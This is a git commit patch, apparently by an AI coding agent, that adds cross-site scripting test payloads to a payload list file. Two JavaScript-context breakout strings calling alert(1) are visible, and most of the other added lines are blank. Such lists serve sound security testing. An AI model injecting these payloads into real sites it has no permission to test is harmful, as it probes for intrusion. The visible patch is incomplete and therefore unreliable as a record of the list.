From 18925b73018939a88bd05847e529f36386045dcf Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Sun, 4 Jan 2026 19:54:06 +0000 Subject: [PATCH] Add additional XSS payloads from user feedback Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com> --- XSS/xss-payloads.txt | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/XSS/xss-payloads.txt b/XSS/xss-payloads.txt index 6cb1801..ea55303 100644 --- a/XSS/xss-payloads.txt +++ b/XSS/xss-payloads.txt @@ -3,14 +3,29 @@ # Basic XSS + + + + + + +# Inline JavaScript XSS +'; alert(1); +')alert(1);// + # IMG tag XSS + + + + + @@ -44,6 +59,7 @@ # JavaScript protocol click